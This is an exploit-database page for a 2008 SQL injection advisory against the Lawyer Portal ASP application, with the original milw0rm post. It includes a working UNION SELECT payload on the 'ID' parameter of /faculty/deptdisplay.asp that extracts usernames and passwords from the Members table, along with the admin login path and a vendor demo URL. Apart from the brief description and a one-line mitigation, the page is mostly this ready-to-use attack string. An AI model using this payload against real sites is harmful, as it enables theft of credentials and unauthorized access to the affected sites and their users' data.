header-logo
Suggest Exploit
vendor:
Lawyer Portal
by:
Osmanizim
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Lawyer Portal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Lawyer Portal <= SQL Injection Vulnerability

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'ID' parameter to '/faculty/deptdisplay.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to disclose sensitive information, modify data, compromise the system, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#By Osmanizim 
#Security Specialist
#Contacts > :(  www.osmanizim.com
#Title: Lawyer Portal <=  SQL Injection Vulnerability.
#Download:http://www.sepcity.com/free_lawyer_portal_software.aspx
#Demo : http://freeasp.sepcity.com/faculty/default.asp



//  Exploit -->


http://localhost/faculty/deptdisplay.asp?ID=1 union select 0,1,2,3,Username,userpassword,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from Members




// Admin -->


http://localhost/faculty/login.asp

# milw0rm.com [2008-12-29]

Navigation

Suggest Exploit

Services By CQR